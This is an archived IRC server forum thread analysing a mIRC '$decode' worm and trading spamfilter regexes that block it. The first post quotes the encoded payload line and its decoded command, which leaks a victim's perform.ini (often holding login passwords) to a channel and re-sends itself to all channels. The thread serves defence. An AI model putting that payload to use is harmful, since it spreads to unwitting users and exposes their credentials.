mIRC $decode exploit

These are old archives. They are kept for historic purposes only.
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US
Contact:

mIRC $decode exploit

Post by Stealth »

The newest form of exploit for mIRC uses $decode.

This exploit is seen as lines that look like this:

Code: Select all

LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:

Code: Select all

//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the persons perform.ini file visible to whoever is on the channel it is played to. Since alot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder Windows tells it. The rest are done as "silent" commands.

Not too good with regex, but here is a try:

Code: Select all

spamfilter {
	regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\);"
	target channel;
	action block;
	reason "$decode exploit";
};
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:

Code: Select all

^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are :P )
codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr »

You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.
-- codemastr
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US
Contact:

Post by Stealth »

I think having .* at the beginnging is a good thing though, since it can have anything there to attract attention.

This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evauluate the output of $decode.

I have also noticed that the echo may have either of these swithces: a (active window) or s (status window)

From what everyone is saying, this regex should match it well enough:

Code: Select all

//echo -[as] $\($decode\(.+,m\),[0-9]\)
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

I've added the following sig to CVS:

Code: Select all

spamfilter {
        regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
        target channel;
        reason "$decode exploit";
        action block;
};
Without escaping the $'s it didn't work here btw ;p.
Gilou
Posts: 3
Joined: Wed Jun 30, 2004 8:45 am
Location: Pornichet, France
Contact:

noobs net

Post by Gilou »

Hi ;)
Actually, the arrival of these bots also let us see (admin) that a lot of noobs were pasting the $decode thing, whatever it might contain, so, may it be paranoia, we decided to block $decode (with a terrible wildcarding), as it's quite useless, and if it does not damage anything, it's quite annoying running after noobs who lets stupid $decode things spread ...
TA GUEULE !
Terantula

I agree, $decode is useless...

Post by Terantula »

... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this, blocking the use of the $decode is not a loss, but a fix to an long existing problem.

I put this spamfilter into my IRCd ASAP.

spamfilter {
regex ".*\$decode\.*";
target channel;
action block;
reason "$decode commands are not permitted on this server.";
};

I dont know anapple from regcode, so I hope this works... :)
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

just $decode by itself is enough...

and you might want to block $encode while you're at it :P
Guest

Post by Guest »

Why? $encode cant be used for that type of exploit. It can create them, but it never gets said on the server...
w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t »

Unless it's been escaped.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

Claims Guest Post Above


But that would only be a mistake. And isnt automatically for creating exploits, so a spamfilter GLINE etc on it wouldnt be good (I $encode my passwords in my connect script to prevent accidental showing to the person behind me. I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
Why the hell can't my signature be empty?
"Your message contains too few characters."
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Jason wrote:I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...

(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor). :) )
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

Oops, Just trying to make an example! Hows this:

//msg $me $encode(pass)
Why the hell can't my signature be empty?
"Your message contains too few characters."
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv :P .
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

$decode you mean, when actually sending it, you would want to decode, not encode
Why the hell can't my signature be empty?
"Your message contains too few characters."
Post Reply